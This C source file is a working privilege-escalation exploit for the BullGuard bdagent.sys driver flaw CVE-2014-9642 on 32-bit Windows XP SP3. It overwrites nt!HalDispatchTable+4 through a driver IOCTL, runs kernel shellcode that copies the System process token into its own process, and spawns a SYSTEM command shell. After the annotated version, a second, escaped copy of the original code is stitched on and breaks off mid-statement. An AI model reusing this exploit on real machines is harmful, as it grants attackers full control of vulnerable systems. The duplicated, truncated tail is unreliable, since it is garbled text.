/*
Exploit Title - BullGuard Multiple Products Arbitrary Write Privilege Escalation
Date - 04th February 2015
Discovered by - Parvez Anwar (@parvezghh)
Vendor Homepage - http://www.bullguard.com/
Tested Version - 14.1.285.4
Driver Version - 1.0.0.6 - BdAgent.sys
Tested on OS - 32bit Windows XP SP3
OSVDB - http://www.osvdb.org/show/osvdb/114478
CVE ID - CVE-2014-9642
Vendor fix url - http://www.bullguard.com/about/release-notes.aspx
Fixed Version - 15.0.288.1
Fixed driver ver - 1.0.0.7
Note
----
HalDispatchTable as seen after the exploit IOCTL and before the restore write. Only the
entry at +4 was targeted, yet everything from +4 through +0x1c has been replaced:
kd> dps nt!HalDispatchTable l c
8054ccb8 00000003
8054ccbc 00340000
8054ccc0 00010000
8054ccc4 0a060002
8054ccc8 ee657645
8054cccc 00000001
8054ccd0 00000001
8054ccd4 867c1bf0
8054ccd8 80613f7b nt!IoSetPartitionInformation
8054ccdc 806141ef nt!IoWritePartitionTable
8054cce0 8052d157 nt!CcHasInactiveViews
8054cce4 804e42d1 nt!ObpTraceDepth+0x19
Seven DWORDs (HalDispatchTable+4 .. +0x1c) are overwritten even though only a 4-byte
input buffer is supplied, so the driver apparently copies a fixed amount larger than the
input to the caller-supplied output address; the six values beyond the shellcode pointer
are whatever happened to follow the input in memory. Because the input buffer is under
our control and these kernel pointers are fixed on the tested XP SP3 build, the exploit
replays the same write with the original seven values (restore_pointers_xp) to repair
the table. Those values are valid for that exact build only; on any other kernel/HAL the
"restore" would itself corrupt the table.
*/
#include <stdio.h>
#include <string.h>
#include <conio.h>
#include <windows.h>
#define BUFSIZE 4096
/*
 * One entry of the (undocumented) SystemModuleInformation result, laid out
 * for 32-bit Windows. The names of the unused members are left as the author
 * had them. HalDispatchTableAddress() relies only on Base (the module's
 * kernel load address) and ImageName (its NT path), and only on Module[0],
 * which it assumes to be the kernel image.
 */
typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
    PVOID Unknown1;
    PVOID Unknown2;
    PVOID Base;             /* kernel-mode load address of the module */
    ULONG Size;
    ULONG Flags;
    USHORT Index;
    USHORT NameLength;
    USHORT LoadCount;
    USHORT PathLength;
    CHAR ImageName[256];    /* NT path, e.g. \WINDOWS\system32\ntoskrnl.exe; not assumed NUL-terminated by the reader */
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
/*
 * Header of the SystemModuleInformation buffer: a count followed by Count
 * variable-length-terminated entries. Module[1] is the classic "at least one"
 * declaration; the real buffer is sized by the kernel's ReturnLength.
 */
typedef struct _SYSTEM_MODULE_INFORMATION {
    ULONG Count;
    SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
/*
 * Information classes for NtQuerySystemInformation. Only
 * SystemModuleInformation is used here (by HalDispatchTableAddress);
 * SystemHandleInformation is declared but not referenced.
 */
typedef enum _SYSTEM_INFORMATION_CLASS {
    SystemModuleInformation = 11,
    SystemHandleInformation = 16
} SYSTEM_INFORMATION_CLASS;
/* ntdll!NtQuerySystemInformation, resolved with GetProcAddress at run time
 * (it is not in the import libraries this file links against). */
typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)(
    SYSTEM_INFORMATION_CLASS SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength);
/* ntdll!NtQueryIntervalProfile. Calling it with a profile source other than
 * ProfileTime (0) makes the kernel call through HalDispatchTable+4, which is
 * how main() turns the overwritten pointer into execution of the payload. */
typedef NTSTATUS (WINAPI *_NtQueryIntervalProfile)(
    DWORD ProfileSource,
    PULONG Interval);
/* Generic function pointer; holds the HalDispatchTable export address that
 * GetProcAddress returns for the user-mode mapping of the kernel image. */
typedef void (*FUNCTPTR)();
/*
 * Windows XP SP3 (32-bit) structure offsets used by token_steal_xp. They are
 * specific to that build; running the payload with these values on any other
 * kernel reads and writes the wrong fields.
 */
#define XP_KPROCESS 0x44 // Offset to _KPROCESS (ApcState.Process) from the _ETHREAD/_KTHREAD that fs:[124h] yields
#define XP_TOKEN 0xc8 // Offset to Token (an EX_FAST_REF; copied as-is, low bits included) from the _EPROCESS struct
#define XP_UPID 0x84 // Offset to UniqueProcessId FROM the _EPROCESS struct
#define XP_APLINKS 0x88 // Offset to ActiveProcessLinks (LIST_ENTRY) in the _EPROCESS struct
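/*
 * Kernel-mode token-stealing payload for 32-bit Windows XP SP3.
 *
 * It runs when the kernel calls through the hijacked HalDispatchTable+4
 * entry (triggered from main() via NtQueryIntervalProfile), i.e. in this
 * process's own thread context. It finds the current process object via
 * fs:[124h] (current thread) + XP_KPROCESS, walks ActiveProcessLinks until
 * it reaches UniqueProcessId == 4 (System), and copies that process's Token
 * field over the current process's Token. No reference is taken on the
 * token, which is the usual shortcut for this technique. ebx is saved and
 * loaded with our own token but never used afterwards; it is kept as-is.
 *
 * The XP_* offsets are build-specific; the payload is not valid on any other
 * Windows version.
 *
 * Fix vs. the original listing: `ret imm16` is a 3-byte instruction (C2 iw).
 * The original ended with only 0xc2,0x08, and because main() pre-fills the
 * buffer with 0x90 the CPU actually decoded `ret 9008h`. The entry being
 * impersonated, HalQuerySystemInformation, is stdcall with four DWORD
 * arguments, so the correct callee epilogue is `ret 10h`.
 */
BYTE token_steal_xp[] =
{
    0x52,                                                   // push edx                     Save edx
    0x53,                                                   // push ebx                     Save ebx
    0x33,0xc0,                                              // xor eax, eax                 eax = 0
    0x64,0x8b,0x80,0x24,0x01,0x00,0x00,                     // mov eax, fs:[eax+124h]       eax = current thread (KPCR+124h)
    0x8b,0x40,XP_KPROCESS,                                  // mov eax, [eax+XP_KPROCESS]   eax = owning _KPROCESS (start of the _EPROCESS)
    0x8b,0xc8,                                              // mov ecx, eax                 ecx = our process, kept for the final store
    0x8b,0x98,XP_TOKEN,0x00,0x00,0x00,                      // mov ebx, [eax+XP_TOKEN]      ebx = our Token (not used afterwards)
    0x8b,0x80,XP_APLINKS,0x00,0x00,0x00,                    // mov eax, [eax+XP_APLINKS] <-| eax = ActiveProcessLinks.Flink
    0x81,0xe8,XP_APLINKS,0x00,0x00,0x00,                    // sub eax, XP_APLINKS         | eax = next _EPROCESS
    0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00,   // cmp [eax+XP_UPID], 4        | UniqueProcessId == 4 (System)?
    0x75,0xe8,                                              // jne ------------------------ back 24 bytes to the Flink load
    0x8b,0x90,XP_TOKEN,0x00,0x00,0x00,                      // mov edx, [eax+XP_TOKEN]      edx = System's Token
    0x8b,0xc1,                                              // mov eax, ecx                 eax = our process
    0x89,0x90,XP_TOKEN,0x00,0x00,0x00,                      // mov [eax+XP_TOKEN], edx      our Token = System's Token
    0x5b,                                                   // pop ebx                      Restore ebx
    0x5a,                                                   // pop edx                      Restore edx
    0xc2,0x10,0x00                                          // ret 10h                      stdcall return, pops the 4 DWORD args
};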
/*
 * The seven DWORDs the exploit IOCTL clobbers at HalDispatchTable+4 through
 * +0x1c, with the values those entries normally hold on the tested 32-bit
 * XP SP3 build (symbol names from kd). main() replays the same IOCTL with
 * this buffer to put them back.
 *
 * NOTE(review): these are raw addresses from one specific ntoskrnl/hal
 * build; on any other build (most likely including other XP service-pack or
 * hotfix levels) the "restore" would write wrong pointers into the table.
 * A string literal is used deliberately: the call site passes
 * sizeof(restore_pointers_xp)-1 to drop the implicit terminating NUL.
 */
BYTE restore_pointers_xp[] = // kd> dps nt!HalDispatchTable
    "\xf2\xa3\x6f\x80" // 8054ccbc 806fa3f2 hal!HaliQuerySystemInformation
    "\xce\xa3\x6f\x80" // 8054ccc0 806fa3ce hal!HaliSetSystemInformation
    "\x0b\x46\x61\x80" // 8054ccc4 8061460b nt!xHalQueryBusSlots
    "\x00\x00\x00\x00" // 8054ccc8 00000000
    "\x4d\xac\x50\x80" // 8054cccc 8050ac4d nt!HalExamineMBR
    "\x89\x6f\x5c\x80" // 8054ccd0 805c6f89 nt!IoAssignDriveLetters
    "\xe5\x4a\x5c\x80"; // 8054ccd4 805c4ae5 nt!IoReadPartitionTable
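/*
 * Locate nt!HalDispatchTable in kernel address space.
 *
 * Method: NtQuerySystemInformation(SystemModuleInformation) lists the loaded
 * kernel modules; entry 0 is taken to be the kernel image and supplies its
 * load address and path. The same file is then mapped into this process with
 * LoadLibraryA so GetProcAddress can resolve the exported HalDispatchTable
 * symbol; (export address - user-mode base) is the RVA, and RVA + kernel base
 * is the kernel address. All arithmetic is 32-bit, which is all this exploit
 * supports.
 *
 * Returns the kernel address, or (DWORD)-1 on failure. Callers must check the
 * result: the original main() added sizeof(DWORD) to it unconditionally,
 * which on failure would have aimed the kernel write at address 3.
 *
 * Changes from the original listing: the size-probe status check was
 * inverted (it rejected success and accepted every failure), the module
 * buffer and the user-mode kernel mapping were never released, the path was
 * copied with strcpy_s from a field that need not be NUL-terminated, and a
 * path without a backslash would have used strrchr's NULL result + 1.
 */
DWORD HalDispatchTableAddress()
{
    _NtQuerySystemInformation NtQuerySystemInformation;
    PSYSTEM_MODULE_INFORMATION pModuleInfo = NULL;
    DWORD HalDispatchTable = (DWORD)-1;
    CHAR kFullName[256];
    CHAR kPath[MAX_PATH];
    PVOID kBase = NULL;
    LPSTR kName;
    HMODULE Kernel = NULL;
    FUNCTPTR Hal;
    ULONG len = 0;
    UINT sysLen;
    size_t nameLen;
    NTSTATUS status;

    NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtQuerySystemInformation");
    if (!NtQuerySystemInformation)
    {
        printf("[-] Unable to resolve NtQuerySystemInformation\n\n");
        return (DWORD)-1;
    }

    /*
     * Size probe. With a NULL buffer the call is expected to fail with
     * STATUS_INFO_LENGTH_MISMATCH (0xC0000004) and report the needed size in
     * len. Loop, because the module list can grow between the probe and the
     * real query; any other failure status ends the loop and is reported.
     */
    for (;;)
    {
        status = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len);
        if (status != (NTSTATUS)0xC0000004L)
            break;
        if (pModuleInfo != NULL)
        {
            GlobalFree(pModuleInfo);
            pModuleInfo = NULL;
        }
        if (len == 0)
            break;
        pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len);
        if (pModuleInfo == NULL)
        {
            printf("[-] An error occurred with GlobalAlloc for pModuleInfo\n\n");
            return (DWORD)-1;
        }
    }
    if (status < 0 || pModuleInfo == NULL || pModuleInfo->Count == 0)
    {
        printf("[-] An error occured while reading NtQuerySystemInformation. Status = 0x%08x\n\n", (unsigned)status);
        if (pModuleInfo != NULL)
            GlobalFree(pModuleInfo);
        return (DWORD)-1;
    }

    /* Entry 0 is assumed to be the kernel image (ntoskrnl.exe / ntkrnlpa.exe). */
    kBase = pModuleInfo->Module[0].Base;

    /* ImageName need not be NUL-terminated within its 256 bytes: copy at most
     * 255 and terminate ourselves. The module list is not needed after this. */
    memcpy(kFullName, pModuleInfo->Module[0].ImageName, sizeof(kFullName) - 1);
    kFullName[sizeof(kFullName) - 1] = '\0';
    GlobalFree(pModuleInfo);
    pModuleInfo = NULL;

    printf("[i] Kernel base name %s\n", kFullName);

    /* File-name component; a path with no separator is used whole. */
    kName = strrchr(kFullName, '\\');
    kName = (kName != NULL) ? kName + 1 : kFullName;

    /* Load the file from the system directory explicitly instead of relying
     * on the loader's search order to find the same image the kernel
     * reported. Fall back to the bare name if the path does not fit. */
    nameLen = strlen(kName);
    sysLen = GetSystemDirectoryA(kPath, sizeof(kPath));
    if (sysLen != 0 && (size_t)sysLen + 1 + nameLen < sizeof(kPath))
    {
        kPath[sysLen] = '\\';
        memcpy(kPath + sysLen + 1, kName, nameLen + 1);
        kName = kPath;
    }

    Kernel = LoadLibraryA(kName);
    if (Kernel == NULL)
    {
        printf("[-] Failed to load kernel base\n\n");
        return (DWORD)-1;
    }

    Hal = (FUNCTPTR)GetProcAddress(Kernel, "HalDispatchTable");
    if (Hal == NULL)
    {
        printf("[-] Failed to find HalDispatchTable\n\n");
        FreeLibrary(Kernel);
        return (DWORD)-1;
    }

    printf("[i] HalDispatchTable address 0x%08lx\n", (unsigned long)(DWORD)Hal);
    printf("[i] Kernel handle 0x%08lx\n", (unsigned long)(DWORD)Kernel);
    printf("[i] Kernel base address 0x%08lx\n", (unsigned long)(DWORD)kBase);

    /* RVA of the export plus the kernel's load address (32-bit only). The
     * user-mode mapping is only needed for this subtraction. */
    HalDispatchTable = ((DWORD)Hal - (DWORD)Kernel + (DWORD)kBase);
    FreeLibrary(Kernel);

    printf("[+] Kernel address of HalDispatchTable 0x%08lx\n", (unsigned long)HalDispatchTable);

    if (!HalDispatchTable)
    {
        printf("[-] Failed to calculate HalDispatchTable\n\n");
        return (DWORD)-1;
    }
    return HalDispatchTable;
}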
/*
 * Classify the running OS from the major/minor version packed into
 * GetVersion().
 *
 * Returns 1 for Windows XP (5.1), 2 for Windows 7 (6.1), 3 for Windows
 * Server 2003 (5.2) and 0 for anything else. Only the version number is
 * inspected: neither bitness nor service pack is checked, so a result of 1
 * does not by itself guarantee that the XP SP3 32-bit offsets in this file
 * apply.
 */
int GetWindowsVersion()
{
    DWORD packed = GetVersion();
    /* Low word of GetVersion(): low byte = major, high byte = minor. */
    DWORD major = (DWORD)LOBYTE(LOWORD(packed));
    DWORD minor = (DWORD)HIBYTE(LOWORD(packed));
    DWORD key = (major << 8) | minor;

    switch (key)
    {
    case (5 << 8) | 1:
        return 1;   /* Windows XP */
    case (6 << 8) | 1:
        return 2;   /* Windows 7 */
    case (5 << 8) | 2:
        return 3;   /* Windows Server 2003 */
    default:
        return 0;
    }
}
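/*
 * Launch cmd.exe in a new console. Called after the kernel payload has
 * replaced this process's token with System's, so the child starts with the
 * elevated token. A failure is reported on stdout and otherwise ignored.
 * The child's handles are closed immediately because nothing waits on it.
 *
 * Changes from the original listing: the duplicated si.cb assignment is
 * gone, the command line lives in a writable buffer (CreateProcess is
 * documented as possibly modifying it), the A variant is called explicitly
 * to match STARTUPINFOA, and handle inheritance is off because the child
 * needs nothing from this process and should not receive any inheritable
 * handles it happens to hold.
 */
void spawnShell()
{
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;
    char cmdline[] = "cmd.exe";

    ZeroMemory(&pi, sizeof(pi));
    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    si.dwFlags = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOWNORMAL;

    if (!CreateProcessA(NULL, cmdline, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
    {
        printf("\n[-] CreateProcess failed (%lu)\n\n", (unsigned long)GetLastError());
        return;
    }

    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
}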
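/*
 * Exploit driver.
 *
 *  1. Refuse to run on anything but Windows XP: the token offsets, the
 *     payload and restore_pointers_xp are all XP SP3 32-bit specific. (The
 *     original also let Windows 7 and Server 2003 through, where the
 *     "restore" write would corrupt a foreign kernel's table.)
 *  2. Allocate an RWX buffer holding the token-stealing payload.
 *  3. Open \\.\bdagent and send IOCTL 0x0022405c with a 4-byte input buffer
 *     holding the payload address and the *output buffer pointer* set to
 *     nt!HalDispatchTable+4 with an output length of 0. The driver writes the
 *     input data to that address without validating it (CVE-2014-9642).
 *  4. Call NtQueryIntervalProfile with a source other than ProfileTime (0),
 *     which makes the kernel call through HalDispatchTable+4, i.e. our
 *     payload, in this thread's context.
 *  5. Replay the IOCTL with the original seven table entries to undo the
 *     collateral damage, then spawn a shell. The restore is done before the
 *     shell (the original did it after) because the token swap has already
 *     happened by then and, while the entry points into this process's user
 *     space, any caller of that HAL entry elsewhere on the machine would
 *     crash the system.
 *
 * Returns 0 once the restore IOCTL has been sent, -1 on any earlier failure.
 * Nothing is written to kernel memory until HalDispatchTableAddress() has
 * succeeded; the original added 4 to its -1 failure value without checking.
 */
int main(int argc, char *argv[])
{
    _NtQueryIntervalProfile NtQueryIntervalProfile;
    LPVOID input[1] = {0};
    LPVOID addrtoshell = NULL;
    HANDLE hDevice = INVALID_HANDLE_VALUE;
    DWORD dwRetBytes = 0;
    DWORD HalDispatchTable;
    DWORD HalDispatchTableTarget;
    ULONG interval = 0;
    const char *devname = "\\\\.\\bdagent";
    int rc = -1;

    (void)argc;
    (void)argv;

    printf("-------------------------------------------------------------------------------\n");
    printf(" BullGuard Multiple Products (bdagent.sys) Arbitrary Write EoP Exploit \n");
    printf(" Tested on Windows XP SP3 (32bit) \n");
    printf("-------------------------------------------------------------------------------\n\n");

    /* GetWindowsVersion() also recognises Windows 7 (2) and Server 2003 (3),
     * but nothing below is valid there. */
    if (GetWindowsVersion() != 1)
    {
        printf("[i] Exploit not supported on this OS\n\n");
        return -1;
    }
    printf("[i] Running Windows XP\n");

    NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtQueryIntervalProfile");
    if (!NtQueryIntervalProfile)
    {
        printf("[-] Unable to resolve NtQueryIntervalProfile\n\n");
        return -1;
    }

    addrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (addrtoshell == NULL)
    {
        printf("[-] VirtualAlloc allocation failure %.8lx\n\n", (unsigned long)GetLastError());
        return -1;
    }
    printf("[+] VirtualAlloc allocated memory at 0x%.8lx\n", (unsigned long)(DWORD)addrtoshell);

    /* Payload at the start of the page, NOP padding after it. */
    memset(addrtoshell, 0x90, BUFSIZE);
    memcpy(addrtoshell, token_steal_xp, sizeof(token_steal_xp));
    printf("[i] Size of shellcode %u bytes\n", (unsigned)sizeof(token_steal_xp));

    hDevice = CreateFileA(devname, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
    if (hDevice == INVALID_HANDLE_VALUE)
    {
        printf("[-] CreateFile open %s device failed (%lu)\n\n", devname, (unsigned long)GetLastError());
        goto cleanup;
    }
    printf("[+] Open %s device successful\n", devname);

    HalDispatchTable = HalDispatchTableAddress();
    if (HalDispatchTable == 0 || HalDispatchTable == (DWORD)-1)
    {
        printf("[-] Could not locate HalDispatchTable, aborting before any kernel write\n\n");
        goto cleanup;
    }
    HalDispatchTableTarget = HalDispatchTable + sizeof(DWORD);
    printf("[+] HalDispatchTable+4 (0x%08lx) will be overwritten\n", (unsigned long)HalDispatchTableTarget);

    /* The driver copies the input buffer to the address given as the output
     * buffer; the output length of 0 is what the tested driver accepted. */
    input[0] = addrtoshell;
    printf("[+] Input buffer contents %08lx\n", (unsigned long)(DWORD)input[0]);

    printf("[~] Press any key to send Exploit . . .\n");
    _getch();

    if (!DeviceIoControl(hDevice, 0x0022405c, input, sizeof(input), (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL))
    {
        /* The restore uses the same IOCTL, so it would fail the same way;
         * nothing more can be done from here. */
        printf("[-] DeviceIoControl failed (%lu), not triggering\n\n", (unsigned long)GetLastError());
        goto cleanup;
    }
    printf("[+] Buffer sent\n");

    /* Trigger: profile source 2 is not ProfileTime, so KeQueryIntervalProfile
     * calls HalDispatchTable[1], now the payload. The return value is of no
     * interest; the side effect on our token is. */
    NtQueryIntervalProfile(2, &interval);

    /* Repair the table as soon as possible; the token has already been
     * swapped (if the payload ran) and nothing else needs the hijacked entry. */
    printf("[+] Restoring Hal dispatch table pointers\n\n");
    if (!DeviceIoControl(hDevice, 0x0022405c, restore_pointers_xp, sizeof(restore_pointers_xp)-1, (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL))
    {
        printf("[-] Restore IOCTL failed (%lu); HalDispatchTable may still point into this process\n\n", (unsigned long)GetLastError());
    }

    printf("[+] Spawning SYSTEM Shell\n");
    spawnShell();
    rc = 0;

cleanup:
    if (hDevice != INVALID_HANDLE_VALUE)
        CloseHandle(hDevice);
    /* addrtoshell is deliberately not freed: if the restore did not happen
     * the kernel table may still reference it, and process exit reclaims it
     * anyway. */
    return rc;
}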
Since input buffer is in our control and pointers \nare static in XP I've triggered the overwrite again restoring the pointers. \n \n*/ \n \n \n#include <stdio.h> \n#include <windows.h> \n \n#define BUFSIZE 4096 \n \n \ntypedef struct _SYSTEM_MODULE_INFORMATION_ENTRY { \nPVOID Unknown1; \nPVOID Unknown2; \nPVOID Base; \nULONG Size; \nULONG Flags; \nUSHORT Index; \nUSHORT NameLength; \nUSHORT LoadCount; \nUSHORT PathLength; \nCHAR ImageName[256]; \n} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY; \n \ntypedef struct _SYSTEM_MODULE_INFORMATION { \nULONG Count; \nSYSTEM_MODULE_INFORMATION_ENTRY Module[1]; \n} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; \n \ntypedef enum _SYSTEM_INFORMATION_CLASS { \nSystemModuleInformation = 11, \nSystemHandleInformation = 16 \n} SYSTEM_INFORMATION_CLASS; \n \ntypedef NTSTATUS (WINAPI *_NtQuerySystemInformation)( \nSYSTEM_INFORMATION_CLASS SystemInformationClass, \nPVOID SystemInformation, \nULONG SystemInformationLength, \nPULONG ReturnLength); \n \ntypedef NTSTATUS (WINAPI *_NtQueryIntervalProfile)( \nDWORD ProfileSource, \nPULONG Interval); \n \ntypedef void (*FUNCTPTR)(); \n \n \n \n// Windows XP SP3 \n \n#define XP_KPROCESS 0x44 // Offset to _KPROCESS from a _ETHREAD struct \n#define XP_TOKEN 0xc8 // Offset to TOKEN from the _EPROCESS struct \n#define XP_UPID 0x84 // Offset to UniqueProcessId FROM the _EPROCESS struct \n#define XP_APLINKS 0x88 // Offset to ActiveProcessLinks _EPROCESS struct \n \n \nBYTE token_steal_xp[] = \n{ \n0x52, // push edx Save edx on the stack \n0x53, // push ebx Save ebx on the stack \n0x33,0xc0, // xor eax, eax eax = 0 \n0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD \n0x8b,0x40,XP_KPROCESS, // mov eax, [eax+XP_KPROCESS] Retrieve _KPROCESS \n0x8b,0xc8, // mov ecx, eax \n0x8b,0x98,XP_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+XP_TOKEN] Retrieves TOKEN \n0x8b,0x80,XP_APLINKS,0x00,0x00,0x00, // mov eax, [eax+XP_APLINKS] <-| Retrieve FLINK from 
ActiveProcessLinks \n0x81,0xe8,XP_APLINKS,0x00,0x00,0x00, // sub eax, XP_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks \n0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+XP_UPID], 4 | Compares UniqueProcessId with 4 (System Process) \n0x75,0xe8, // jne ---- \n0x8b,0x90,XP_TOKEN,0x00,0x00,0x00, // mov edx, [eax+XP_TOKEN] Retrieves TOKEN and stores on EDX \n0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX \n0x89,0x90,XP_TOKEN,0x00,0x00,0x00, // mov [eax+XP_TOKEN], edx Overwrites the TOKEN for the current KPROCESS \n0x5b, // pop ebx Restores ebx \n0x5a, // pop edx Restores edx \n0xc2,0x08 // ret 8 Away from the kernel \n}; \n \n \n \nBYTE restore_pointers_xp[] = // kd> dps nt!HalDispatchTable \n\"\\xf2\\xa3\\x6f\\x80\" // 8054ccbc 806fa3f2 hal!HaliQuerySystemInformation \n\"\\xce\\xa3\\x6f\\x80\" // 8054ccc0 806fa3ce hal!HaliSetSystemInformation \n\"\\x0b\\x46\\x61\\x80\" // 8054ccc4 8061460b nt!xHalQueryBusSlots \n\"\\x00\\x00\\x00\\x00\" // 8054ccc8 00000000 \n\"\\x4d\\xac\\x50\\x80\" // 8054cccc 8050ac4d nt!HalExamineMBR \n\"\\x89\\x6f\\x5c\\x80\" // 8054ccd0 805c6f89 nt!IoAssignDriveLetters \n\"\\xe5\\x4a\\x5c\\x80\"; // 8054ccd4 805c4ae5 nt!IoReadPartitionTable \n \n \n \nDWORD HalDispatchTableAddress() \n{ \n_NtQuerySystemInformation NtQuerySystemInformation; \nPSYSTEM_MODULE_INFORMATION pModuleInfo; \nDWORD HalDispatchTable; \nCHAR kFullName[256]; \nPVOID kBase = NULL; \nLPSTR kName; \nHMODULE Kernel; \nFUNCTPTR Hal; \nULONG len; \nNTSTATUS status; \n \n \nNtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle(\"ntdll.dll\"), \"NtQuerySystemInformation\"); \n \nif (!NtQuerySystemInformation) \n{ \nprintf(\"[-] Unable to resolve NtQuerySystemInformation\\n\\n\"); \nreturn -1; \n} \n \nstatus = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len); \n \nif (!status) \n{ \nprintf(\"[-] An error occured while reading NtQuerySystemInformation. 
Status = 0x%08x\\n\\n\", status); \nreturn -1; \n} \n \npModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len); \n \nif(pModuleInfo == NULL) \n{ \nprintf(\"[-] An error occurred with GlobalAlloc for pModuleInfo\\n\\n\"); \nreturn -1; \n} \n \nstatus = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len); \n \nmemset(kFullName, 0x00, sizeof(kFullName)); \nstrcpy_s(kFullName, sizeof(kFullName)-1, pModuleInfo->Module[0].ImageName); \nkBase = pModuleInfo->Module[0].Base; \n \nprintf(\"[i] Kernel base name %s\\n\", kFullName); \nkName = strrchr(kFullName, '\\\\'); \n \nKernel = LoadLibraryA(++kName); \n \nif(Kernel == NULL) \n{ \nprintf(\"[-] Failed to load kernel base\\n\\n\"); \nreturn -1; \n} \n \nHal = (FUNCTPTR)GetProcAddress(Kernel, \"HalDispatchTable\"); \n \nif(Hal == NULL) \n{ \nprintf(\"[-] Failed to find HalDispatchTable\\n\\n\"); \nreturn -1; \n} \n \nprintf(\"[i] HalDispatchTable address 0x%08x\\n\", Hal); \nprintf(\"[i] Kernel handle 0x%08x\\n\", Kernel); \nprintf(\"[i] Kernel base address 0x%08x\\n\", kBase); \n \nHalDispatchTable = ((DWORD)Hal - (DWORD)Kernel + (DWORD)kBase); \n \nprintf(\"[+] Kernel address of HalDispatchTable 0x%08x\\n\", HalDispatchTable); \n \nif(!HalDispatchTable) \n{ \nprintf(\"[-] Failed to calculate HalDispatchTable\\n\\n\"); \nreturn -1; \n} \n \nreturn HalDispatchTable; \n} \n \n \nint GetWindowsVersion() \n{ \nint v = 0; \nDWORD version = 0, minVersion = 0, majVersion = 0; \n \nversion = GetVersion(); \n \nminVersion = (DWORD)(HIBYTE(LOWORD(version))); \nmajVersion = (DWORD)(LOBYTE(LOWORD(version))); \n \nif (minVersion == 1 && majVersion == 5) v = 1; // \"Windows XP; \nif (minVersion == 1 && majVersion == 6) v = 2; // \"Windows 7\"; \nif (minVersion == 2 && majVersion == 5) v = 3; // \"Windows Server 2003; \n \nreturn v; \n} \n \n \nvoid spawnShell() \n{ \nSTARTUPINFOA si; \nPROCESS_INFORMATION pi; \n \n \nZeroMemory(&pi, sizeof(pi)); \nZeroMemory(&si, sizeof(si)); \nsi.cb = sizeof(si); 
\n \nsi.cb = sizeof(si); \nsi.dwFlags = STARTF_USESHOWWINDOW; \nsi.wShowWindow = SW_SHOWNORMAL; \n \nif (!CreateProcess(NULL, \"cmd.exe\", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi)) \n{ \nprintf(\"\\n[-] CreateProcess failed (%d)\\n\\n\", GetLastError()); \nreturn; \n} \n \nCloseHandle(pi.hThread); \nCloseHandle(pi.hProcess); \n} \n \n \nint main(int argc, char *argv[]) \n{ \n \n_NtQueryIntervalProfile NtQueryIntervalProfile; \nLPVOID input[1] = {0}; \nLPVOID addrtoshell; \nHANDLE hDevice; \nDWORD dwRetBytes = 0; \nDWORD HalDispatchTableTarget; \nULONG time = 0; \nunsigned char devhandle[MAX_PATH]; \n \n \nprintf(\"-------------------------------------------------------------------------------\\n\"); \nprintf(\" BullGuard Multiple Products (bdagent.sys) Arbitrary Write EoP Exploit \\n\"); \nprintf(\" Tested on Windows XP SP3 (32bit) \\n\"); \nprintf(\"-------------------------------------------------------------------------------\\n\\n\"); \n \nif (GetWindowsVersion() == 1) \n{ \nprintf(\"[i] Running Windows XP\\n\"); \n} \n \nif (GetWindowsVersion() == 0) \n{ \nprintf(\"[i] Exploit not supported on this OS\\n\\n\"); \nreturn -1; \n} \n \nsprintf(devhandle, \"\\\\\\\\.\\\\%s\", \"bdagent\"); \n \nNtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle(\"ntdll.dll\"), \"NtQueryIntervalProfile\"); \n \nif (!NtQueryIntervalProfile) \n{ \nprintf(\"[-] Unable to resolve NtQueryIntervalProfile\\n\\n\"); \nreturn -1; \n} \n \naddrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); \n \nif(addrtoshell == NULL) \n{ \nprintf(\"[-] VirtualAlloc allocation failure %.8x\\n\\n\", GetLastError()); \nreturn -1; \n} \nprintf(\"[+] VirtualAlloc allocated memory at 0x%.8x\\n\", addrtoshell); \n \nmemset(addrtoshell, 0x90, BUFSIZE); \nmemcpy(addrtoshell, token_steal_xp, sizeof(token_steal_xp)); \nprintf(\"[i] Size of shellcode %d bytes\\n\", sizeof(token_steal_xp)); \n \nhDevice = CreateFile(devhandle, 
